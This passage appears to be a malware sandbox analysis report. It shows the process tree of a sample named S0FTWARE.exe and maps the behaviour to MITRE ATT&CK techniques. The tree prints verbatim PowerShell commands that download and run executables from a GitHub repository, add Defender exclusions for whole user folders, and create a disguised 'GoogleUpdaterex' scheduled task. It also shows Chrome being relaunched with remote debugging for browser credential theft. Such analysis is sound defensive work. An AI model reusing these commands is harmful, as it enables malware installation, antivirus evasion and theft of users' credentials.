      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2128,i,5582364626696228104,8263534744667878023,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=2124 /prefetch:2
      4⤵
      PID:3156
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2368,i,5582364626696228104,8263534744667878023,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=2436 /prefetch:8
      4⤵
      PID:628
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3144,i,5582364626696228104,8263534744667878023,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=3216 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:3148
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3152,i,5582364626696228104,8263534744667878023,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=3236 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:5832
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4416,i,5582364626696228104,8263534744667878023,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=4440 /prefetch:2
      4⤵
      Uses browser remote debugging
      PID:448
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4616,i,5582364626696228104,8263534744667878023,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=4656 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:2120
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
    3⤵
    - Uses browser remote debugging
    PID:2044
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xf8,0xfc,0x100,0xe0,0x104,0x7ffbca40dcf8,0x7ffbca40dd04,0x7ffbca40dd10
      4⤵
      PID:4652
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2068,i,16278748094522423926,16669523897806159127,262144 --variations-seed-version --mojo-platform-channel-handle=2064 /prefetch:2
      4⤵
      PID:3588
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1936,i,16278748094522423926,16669523897806159127,262144 --variations-seed-version --mojo-platform-channel-handle=2096 /prefetch:3
      4⤵
      PID:1592
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2380,i,16278748094522423926,16669523897806159127,262144 --variations-seed-version --mojo-platform-channel-handle=2552 /prefetch:8
      4⤵
      PID:332
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3148,i,16278748094522423926,16669523897806159127,262144 --variations-seed-version --mojo-platform-channel-handle=3164 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:4212
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3168,i,16278748094522423926,16669523897806159127,262144 --variations-seed-version --mojo-platform-channel-handle=3196 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:32
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4208,i,16278748094522423926,16669523897806159127,262144 --variations-seed-version --mojo-platform-channel-handle=4240 /prefetch:2
      4⤵
      Uses browser remote debugging
      PID:2864
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4628,i,16278748094522423926,16669523897806159127,262144 --variations-seed-version --mojo-platform-channel-handle=4556 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:5868
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/bil3.exe' -OutFile 'C:\Users\Admin\AppData\Local\tiyephlpp\mtbfkkfziuk.exe'"
  2⤵
  PID:536
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/bil3.exe' -OutFile 'C:\Users\Admin\AppData\Local\tiyephlpp\mtbfkkfziuk.exe'"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:4720
- C:\Users\Admin\AppData\Local\tiyephlpp\ezshtssebmgo.exe
  "C:\Users\Admin\AppData\Local\tiyephlpp\ezshtssebmgo.exe"
  2⤵
  PID:4512
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C schtasks /create /tn GoogleUpdaterex /tr %APPDATA%\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
    3⤵
    PID:2900
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /create /tn GoogleUpdaterex /tr C:\Users\Admin\AppData\Roaming\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:3020
- C:\Users\Admin\AppData\Local\tiyephlpp\mtbfkkfziuk.exe
  "C:\Users\Admin\AppData\Local\tiyephlpp\mtbfkkfziuk.exe"
  2⤵
  PID:376

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
1⤵
PID:4056

C:\Users\Admin\Desktop\egg\S0FTWARE.exe
"C:\Users\Admin\Desktop\egg\S0FTWARE.exe"
1⤵
PID:4520
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\avqfo', 'C:\Users', 'C:\ProgramData'"
  2⤵
  PID:2820
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\avqfo', 'C:\Users', 'C:\ProgramData'"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:5384
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/bilvarw.exe' -OutFile 'C:\Users\Admin\AppData\Local\avqfo\vudslg.exe'"
  2⤵
  PID:5996
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/bilvarw.exe' -OutFile 'C:\Users\Admin\AppData\Local\avqfo\vudslg.exe'"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:5716
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/bil2.exe' -OutFile 'C:\Users\Admin\AppData\Local\avqfo\tkjbn.exe'"
  2⤵
  PID:2948
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/bil2.exe' -OutFile 'C:\Users\Admin\AppData\Local\avqfo\tkjbn.exe'"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:4780
- C:\Users\Admin\AppData\Local\avqfo\vudslg.exe
  "C:\Users\Admin\AppData\Local\avqfo\vudslg.exe"
  2⤵
  PID:6044
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
    3⤵
    - Uses browser remote debugging
    PID:5564
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffbca40dcf8,0x7ffbca40dd04,0x7ffbca40dd10
      4⤵
      PID:1880
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/bil3.exe' -OutFile 'C:\Users\Admin\AppData\Local\avqfo\rsyvunwhu.exe'"
  2⤵
  PID:1604
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/bil3.exe' -OutFile 'C:\Users\Admin\AppData\Local\avqfo\rsyvunwhu.exe'"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:2152
- C:\Users\Admin\AppData\Local\avqfo\tkjbn.exe
  "C:\Users\Admin\AppData\Local\avqfo\tkjbn.exe"
  2⤵
  PID:1740
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C schtasks /create /tn GoogleUpdaterex /tr %APPDATA%\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
    3⤵
    PID:4900
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /create /tn GoogleUpdaterex /tr C:\Users\Admin\AppData\Roaming\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:5352
- C:\Users\Admin\AppData\Local\avqfo\rsyvunwhu.exe
  "C:\Users\Admin\AppData\Local\avqfo\rsyvunwhu.exe"
  2⤵
  PID:3848

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
1⤵
PID:4304

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
1⤵
PID:1000

Network

MITRE ATT&CK Enterprise v16

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Modify Authentication Process

Power Settings

T1653

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

Impair Defenses

T1562

Modify Authentication Process

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Modify Authentication Process

Steal Web Session Cookie

T1539

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Query Registry

System Information Discovery